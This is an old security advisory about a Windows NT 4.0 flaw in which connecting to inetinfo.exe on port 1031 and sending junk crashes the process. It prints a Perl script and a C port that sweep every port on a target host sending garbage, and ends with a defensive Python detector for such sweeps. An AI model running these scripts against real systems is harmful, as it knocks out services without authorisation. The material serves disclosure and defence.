COMMAND

    inetinfo.exe

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    NT also turns out to be vulnerable to exactly the same attack as previously posted for port 135 (connecting and throwing garbage at it), this time on another port, namely 1031 (inetinfo). The inetinfo.exe process goes insane on NT 4.0. This seems to be exploitable only locally. To try, telnet to 1031 on an NT machine, type garbage, then disconnect. Credit for this goes to Bob Beck. David Litchfield added that you don't even need to type garbage: all you need to do is telnet to port 1031 and then disconnect, which does the same job (localhost only, and it's not always port 1031, as IIS chooses these ports randomly). Below is what Bob Beck and Chris Bayly rigged up to check:

#!/usr/local/bin/perl
use Socket;
use FileHandle;
require "chat2.pl";

$ILoveBill = shift @ARGV or die "usage: $0 host\n";   # target host
$verbose    = 0;   # set to 1 to print each port as it is tried
$knownports = 0;   # set to 1 to skip the known problem ports (135, 1031)

for ($port = 1; $port < 65535; $port++) {
    if ($knownports && ($port == 135 || $port == 1031)) {
        next;
    }
    # chat2.pl's open_port returns undef when the connect fails
    $fh = chat::open_port($ILoveBill, $port);
    next unless $fh;
    chat::print($fh, "Windows NT is the platform of the future");
    if ($verbose) {
        print "Trying port: $port\n\n";
    }
    chat::close($fh);
}

    Evan L. Carew posted the following C port of the script above (tested under Linux with GCC v2.7.2.3):

/* This program is not intended to be used to bring down NT  */
/* servers or WIN95 clients but rather as a tool for finding */
/* weaknesses in your installations                          */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define MAXPORTNUM 65535

int main(int argc, char **argv)
{
    int n, s, len;
    unsigned int soc;        /* a u_short counter would wrap at 65535 and loop forever */
    char buf[1024];
    char *hostname;
    struct hostent *hp;
    struct sockaddr_in name;

    if (argc < 2) {
        printf("Usage: %s hostname\n", *argv);
        exit(1);
    }
    hostname = *++argv;
    hp = gethostbyname(hostname);
    if (hp == NULL) {
        fprintf(stderr, "cannot resolve %s\n", hostname);
        exit(1);
    }

    soc = 1;
    while (soc <= MAXPORTNUM) {
        /* create a socket */
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0) {
            perror("socket");
            exit(1);
        }
        memset(&name, 0, sizeof(struct sockaddr_in));
        name.sin_family = AF_INET;
        name.sin_port = htons((unsigned short)soc);
        memcpy(&name.sin_addr, hp->h_addr_list[0], hp->h_length);
        len = sizeof(struct sockaddr_in);
        printf("Trying port %u\n", soc);
        if (!connect(s, (struct sockaddr *)&name, len)) {
            printf("connected to port %u\n", soc);
            /* send a short string of junk, then close */
            strcpy(buf, "jfiebnfvmrur84j dfj494 40wetnt");
            len = strlen(buf);
            n = send(s, buf, len, 0);
            (void)n;
        }
        close(s);
        ++soc;
    }
    exit(0);
}

SOLUTION

    Not available at this moment. Anyway, check whether you need the vulnerable ports. If you don't, great, disable them!
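A detection-side counterpart, added here as an example and not part of the original advisory or its authors' code: it scans constructed connection records (an assumed, generic format, not any real firewall's) for the signature of the probes above, one source touching many ports on one host in quick succession while sending little or no data.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed record format (assumed, not any real firewall's):
# <date> <time> <src_ip>:<src_port> -> <dst_ip>:<dst_port> bytes=<n>
LINE_RE = re.compile(
    r"^(\S+ \S+) (\d+\.\d+\.\d+\.\d+):\d+ -> (\d+\.\d+\.\d+\.\d+):(\d+) bytes=(\d+)$")

def parse(line):
    # (ts, src, dst, dst_port, bytes_sent), or None for lines that do not match
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    return ts, m.group(2), m.group(3), int(m.group(4)), int(m.group(5))

def detect_port_sweeps(lines, min_ports=20, window_s=60, max_bytes=64):
    """(src, dst) -> sorted ports, for each source that reached min_ports distinct
    ports on one host within window_s seconds, sending <= max_bytes per connection."""
    hits = defaultdict(list)  # (src, dst) -> [(ts, dst_port)]
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, src, dst, port, nbytes = rec
        if nbytes <= max_bytes:
            hits[(src, dst)].append((ts, port))
    sweeps = {}
    for key, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding time window over sorted events
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            if len({p for _, p in events[start:end + 1]}) >= min_ports:
                sweeps[key] = sorted({p for _, p in events})  # report every port touched
                break
    return sweeps

# Constructed sample: one host walks ports 1025-1054 in 30 s beside ordinary web hits.
SAMPLE_LOG = [
    f"1997-08-14 10:02:{i:02d} 10.0.0.5:{3000 + i} -> 10.0.0.9:{1025 + i} bytes=31"
    for i in range(30)
] + ["1997-08-14 10:02:05 10.0.0.7:1544 -> 10.0.0.9:80 bytes=412", "not a record"]

if __name__ == "__main__":
    for (src, dst), ports in detect_port_sweeps(SAMPLE_LOG).items():
        print(f"sweep from {src} against {dst}: ports {ports[0]}-{ports[-1]}")
```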